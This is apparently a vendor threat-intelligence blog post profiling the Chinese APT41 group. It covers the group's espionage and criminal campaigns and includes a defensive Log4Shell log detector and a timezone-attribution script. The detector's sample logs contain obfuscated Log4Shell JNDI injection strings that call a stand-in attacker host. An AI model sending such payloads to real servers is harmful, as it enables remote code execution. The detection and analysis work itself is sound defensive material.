February 20, 2024
Stealthy, sustained, and frequently state-backed, advanced persistent threats (APTs for short) are often the leading antagonists of the cyber threat intelligence scene. But with murky intelligence, unclear goals, and inconsistent naming conventions (do we really need six names for one group?), making sense of APT groups is often easier said than done for both the average reader and experts alike.
APTs are so named for their advanced technical sophistication, their persistent access to (or persistent attempts to access) target systems, and the significant threat they pose to nation states, companies, and individuals. Sustaining all three usually requires state support: APT groups are typically linked to national governments, which may fund them, turn a blind eye to their criminal activity, or directly task their operations. Most such groups are tied to the so-called big four of APT threats (Russia, the People’s Republic of China (PRC), Iran, and North Korea), but others support the interests of countries including Turkey, Israel, Pakistan, India, South Korea, and the US.
This blog is the first in a series aimed at demystifying APT groups around the world, as well as their group dynamics, goals, and techniques. With Chinese APTs making waves during tensions with Taiwan and the US, infamous Chinese APT group “APT41” is the first up to bat.
APT41 (aka Wicked Panda, BARIUM, Wicked Spider, Blackfly, Double Dragon, and so on) is one of the most prolific Chinese threat groups. The group’s many cyber-espionage campaigns are likely motivated by Chinese political and economic goals, including the Belt and Road Initiative (BRI), and Made In China 2025 (MIC 2025). However, unlike many politically motivated APT groups, APT41 poses a dual threat, being known to have conducted financially motivated ransomware attacks and attacks against the video game industry in particular. APT41 is a natural starting point for this series, due to the wealth of internal information we have about the group. Unlike most APT groups, for whom stealth is paramount, we know several members of APT41, where they are based, and what techniques they usually use. This is in part due to US federal indictments of five of its members in August 2019 and August 2020 on charges including wire fraud, identity theft, and racketeering, as well as unauthorized computer intrusions affecting over 100 companies and individuals worldwide.
According to these indictments, much of APT41’s activity stems from the Chinese city of Chengdu, a growing technology hub in the southwestern province of Sichuan. Famous for its giant pandas (the animal, not the APTs), the city is also gaining a reputation for both white- and black-hat hackers, and hosts the Tianfu Cup, the PRC’s premier hacking contest and its answer to the West’s Pwn2Own. Fittingly, APT41’s known members are largely network security engineers, many of whom operated under the guise of a supposedly legitimate network security company known as Chengdu 404. The controversial whistleblowing site Intrusion Truth also claims that the group has significant ties to Sichuan University and Chengdu University of Information Technology, and may use these links for recruitment.
APT41 members have ties with the Chinese Ministry of State Security (MSS). One member claimed to be “very close” with the “GA” (aka MSS), and claimed that the MSS would protect him “unless something very big happens.” Other members have also performed legitimate contracting work for the MSS. However, it is unlikely that the group works as part of the Chinese security apparatus. Many group members have criminal rap sheets or ties to cyber-criminal entities, such as the Network Crack Program Hacker (NCPH) group. According to the FBI, members have also made statements about not targeting domestic Chinese entities so as to avoid the ire of the MSS. It is more likely that the group conducts cyber-espionage activity on a more contractual basis for the MSS, although whether this is motivated by patriotism, money, commuted prison sentences, or simply the “lolz” is unconfirmed.
Despite the indictments of some of its members, the absence of a US-China extradition treaty and of any Chinese political goodwill means that APT41 remains free to pose a menacing cyber-espionage threat. APT41 has successfully compromised government and critical infrastructure networks around the world and has been attributed to more cyber-espionage campaigns than we have time to name. The group is notable as a pioneer of supply-chain attacks, i.e. compromising widely used third-party tools and software to reach the customers who install them (the 2017 trojanized CCleaner and NetSarang/ShadowPad releases are among the incidents linked to the group), and it also routinely exploits vulnerabilities in internet-facing applications and deploys custom malware to compromise victims.
One example of APT41’s vulnerability exploitation is its campaign against US state government networks. From May 2021 to February 2022, APT41 gained access to at least six state networks by exploiting vulnerabilities in internet-facing web applications. This included a zero-day (CVE-2021-44207) in USAHerds, a commercial application used by state agriculture agencies to track disease in cows and other livestock (commence sad moo noises), as well as the “Log4Shell” remote code execution (RCE) vulnerability in the Log4j logging library (CVE-2021-44228), which the group began exploiting within hours of its public disclosure. Earlier, from January to March 2020, APT41 conducted one of the broadest vulnerability exploitation campaigns observed in recent years, exploiting Citrix, Zoho ManageEngine, and Cisco router vulnerabilities against entities in at least 20 countries and at least 19 sectors.
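The Log4Shell lookup that lands in a victim’s logs is easy to match in its plain form, but real exploitation traffic (including the waves that followed the December 2021 disclosure) hides the string `jndi` behind nested lookups such as `${lower:j}` and `${::-j}`, or behind URL encoding. The detector below is an added example written for this article, not code from the original post, from ReliaQuest, or from any vendor report on APT41; it resolves those obfuscations the way Log4j’s own substitution engine would before matching. The access-log lines, hostnames, and IP addresses in it are constructed.

```python
"""Normalize common Log4Shell (CVE-2021-44228) obfuscations and flag JNDI lookups.

Added example for this article; not code from the original post or from any vendor.
The log lines below are constructed; hostnames and IPs are placeholders.
"""
import re
from urllib.parse import unquote

# Constructed Apache-style access log lines (not real traffic).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:01:12 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:02:44 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:03:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${lower:n}di:${lower:l}dap://attacker.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:10:03:20 +0000] '
    '"GET /?x=${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://attacker.example/c} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:10:03:41 +0000] '
    '"GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fd%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.7 - - [10/Dec/2021:10:04:00 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]

# Innermost ${...} that contains no nested lookup.
INNER = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup: ${jndi:<scheme>:...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9]+)\s*:", re.IGNORECASE)


def resolve(expr: str) -> str:
    """Evaluate one non-nested lookup body for the handful of lookups attackers
    use to hide the word 'jndi'; anything else is left untouched."""
    if ":-" in expr:                      # ${<unknown key>:-default} -> default
        return expr.split(":-", 1)[1]
    prefix, sep, value = expr.partition(":")
    if sep and prefix.lower() == "lower":
        return value.lower()
    if sep and prefix.lower() == "upper":
        return value.upper()
    # env:, sys:, date:, jndi: ... produce runtime values we cannot know here
    return "${" + expr + "}"


def normalize(s: str, max_rounds: int = 32) -> str:
    """Resolve nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        out = INNER.sub(lambda m: resolve(m.group(1)), s)
        if out == s:
            return out
        s = out
    return s


def scan_line(line: str) -> dict:
    """Undo URL encoding, de-obfuscate, then look for a JNDI lookup."""
    norm = normalize(unquote(line))
    m = JNDI.search(norm)
    if not m:
        return {"hit": False}
    return {"hit": True, "scheme": m.group(1).lower(), "normalized": norm}


def scan(lines):
    """Return (1-based line number, finding) for every line carrying a JNDI lookup."""
    findings = []
    for n, line in enumerate(lines, 1):
        f = scan_line(line)
        if f["hit"]:
            findings.append((n, f))
    return findings


if __name__ == "__main__":
    for n, f in scan(SAMPLE_LOGS):
        print(f"line {n}: jndi lookup via {f['scheme']}")
```

Run against the constructed sample, lines 2 to 5 are flagged (plain, `lower:`-nested, `:-`-default, and URL-encoded forms) and line 6 is not, even though it carries a `${env:HOME}` lookup. In production you would alert on that survivor too: any unresolved `${...}` arriving in untrusted input (User-Agent, query string, headers) is a probe worth recording, and the resolver above only covers the `lower`, `upper`, and default-value tricks, so extend `resolve` as new evasions appear rather than trusting it as complete.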
In addition to opportunistic vulnerability exploitation, the group has been linked to custom malware, including the Unified Extensible Firmware Interface (UEFI) implant “MoonBounce”, which Kaspersky disclosed in January 2022 and attributed to APT41. MoonBounce was reportedly used to exfiltrate sensitive personal and intellectual property information from targets including a transportation technology company. UEFI implants live in the motherboard’s SPI flash rather than on disk, so they survive operating system reinstallation and even drive replacement, and they are invisible to endpoint tools that only inspect the OS; verifying a system means comparing the firmware image or measured-boot (TPM PCR) values against a vendor-known-good baseline. One researcher dubbed MoonBounce “the most advanced UEFI firmware implant discovered in the wild to date”, an uncomfortable insight into APT41’s technical capabilities.
APT41 is therefore stealthy, technologically capable, and persistent in its cyber-espionage attacks: all unfortunate hallmarks of an APT group. But while most of its cyber-espionage attacks are conducted—quite literally—by day, it also conducts cyber-criminal campaigns by night.
Further evidence that APT41 is only partly under Chinese government control comes from Mandiant’s (then FireEye’s) 2019 analysis of when the group’s different campaign types run. During Beijing working hours, the group predominantly conducts cyber-espionage attacks, while at night, ransomware attacks and money-making schemes prevail. As most Chinese government-linked APT groups do not conduct financially motivated attacks, it is likely that the MSS turns a blind eye to these activities, so long as APT41 continues to provide it with valuable intelligence.
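The day-job/night-job split is a standard threat-intelligence technique: convert each observed event to a candidate local time zone, bucket it by weekday and hour, and see which zone puts the state-style activity into office hours. The script below is an added example for this article, not code from the original post, from ReliaQuest, or from Mandiant, and its event list is constructed to illustrate the method rather than drawn from any real APT41 dataset. It also goes one step beyond the text by scoring every whole-hour UTC offset to see which one best explains the espionage timestamps.

```python
"""Bucket attacker activity by local working hours and find the best-fitting UTC offset.

Added example for this article; not code from the original post or from Mandiant.
The events are constructed for illustration, not observed APT41 activity.
"""
from collections import Counter
from datetime import datetime, timedelta, timezone

BEIJING = timezone(timedelta(hours=8))  # China Standard Time has no DST, so a fixed offset is exact

# Constructed events: (first-seen timestamp in UTC, campaign type).
EVENTS = [
    ("2022-03-01T02:15:00Z", "espionage"),   # Tue 10:15 Beijing
    ("2022-03-01T06:40:00Z", "espionage"),   # Tue 14:40 Beijing
    ("2022-03-01T09:30:00Z", "espionage"),   # Tue 17:30 Beijing
    ("2022-03-01T15:05:00Z", "ransomware"),  # Tue 23:05 Beijing
    ("2022-03-01T18:30:00Z", "game-fraud"),  # Wed 02:30 Beijing
    ("2022-03-02T01:00:00Z", "espionage"),   # Wed 09:00 Beijing
    ("2022-03-05T03:00:00Z", "espionage"),   # Sat 11:00 Beijing
    ("2022-03-05T17:00:00Z", "ransomware"),  # Sun 01:00 Beijing
]


def to_local(ts_utc: str, tz=BEIJING) -> datetime:
    """Parse an ISO-8601 UTC stamp ending in 'Z' and convert it to the given zone."""
    return datetime.fromisoformat(ts_utc.replace("Z", "+00:00")).astimezone(tz)


def shift(local: datetime) -> str:
    """Crude office-hours model: Mon-Fri 09:00-17:59 is 'work', everything else 'off-hours'."""
    if local.weekday() < 5 and 9 <= local.hour < 18:
        return "work"
    return "off-hours"


def profile(events, tz=BEIJING) -> Counter:
    """Count events by (shift, campaign type) in the analyst's candidate zone."""
    table = Counter()
    for ts, kind in events:
        table[(shift(to_local(ts, tz)), kind)] += 1
    return table


def work_fraction(events, offset_hours: int, kind: str) -> float:
    """Fraction of this campaign type that falls in office hours at a given UTC offset."""
    tz = timezone(timedelta(hours=offset_hours))
    stamps = [to_local(ts, tz) for ts, k in events if k == kind]
    if not stamps:
        return 0.0
    return sum(shift(t) == "work" for t in stamps) / len(stamps)


def best_fit_offset(events, kind="espionage"):
    """Whole-hour UTC offset that puts the most of `kind` into office hours.
    Ties go to the offset nearest UTC; only a clear winner is meaningful."""
    scores = {off: work_fraction(events, off, kind) for off in range(-12, 15)}
    best = max(scores, key=lambda off: (scores[off], -abs(off)))
    return best, scores[best]


if __name__ == "__main__":
    for (when, kind), n in sorted(profile(EVENTS).items()):
        print(f"{when:9s} {kind:10s} {n}")
    off, frac = best_fit_offset(EVENTS)
    print(f"espionage activity best fits UTC{off:+d} ({frac:.0%} in office hours)")
```

On the constructed sample the espionage events cluster in the UTC+8 working day (four of five) while every ransomware and game-fraud event lands off-hours, and UTC+8 is the unique best-fitting offset for the espionage set. Treat this as a weak signal: timestamps from compile times, commits, or command-and-control check-ins are trivially forged, the 09:00-18:00 model is a guess about someone else’s office, and a handful of events proves nothing. Mandiant’s observation rests on a large body of activity over years, which is what lets the pattern stand out from noise.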
APT41 has frequently targeted the video game and online gambling industries in such attacks. The group has deployed ransomware against video game companies and has conducted watering hole attacks against online gamblers. A watering hole attack compromises a website that the intended victims are known to visit and plants malware there so that the site infects its visitors. APT41 has also compromised video game systems to fraudulently generate in-game currency and digital goods (think cool skins, artifacts, and weapons) and sell them to legitimate gamers for profit. In line with the group’s sophistication, it also reportedly monitored gaming companies’ fraud detection teams so as to avoid being detected, and compromised other cyber-criminal groups conducting similar schemes in order to steal their goods and eliminate competition.
For king and country (or for general secretary and party) is apparently not enough for APT41. The group is either not paid enough by the Chinese government, or greed has simply gotten the better of its members and pushed them to lead a double life. Either way, the group’s dual motivations, and broad tactics, techniques, and procedures (TTPs) mean that it poses a threat to many industries, from many angles.
For a group of network security professionals from Chengdu, APT41’s scope and impact have been considerable. The group poses an ongoing challenge to governments and security teams alike due to its unpredictable motivations and TTPs, be they cyber-espionage or cyber-criminal in nature. Although tensions between the PRC and Taiwan have eased somewhat since US House Speaker Nancy Pelosi’s visit in August 2022, it is realistically possible that APT41 will choose Taiwanese organizations as its next target in retaliation for the visit. To stay informed of APT41’s latest activity, sign up for a demo of SearchLight (now ReliaQuest’s GreyMatter Digital Risk Protection) here.
Keep an eye out for the next installment of our APT Spotlight Series. The Photon Research Team maintains a library of more than 500 threat profiles to choose from, which help our clients navigate the quickly evolving threat landscape. To see how SearchLight (now ReliaQuest’s GreyMatter Digital Risk Protection) can work for you, take a test drive for seven days and explore our research in depth.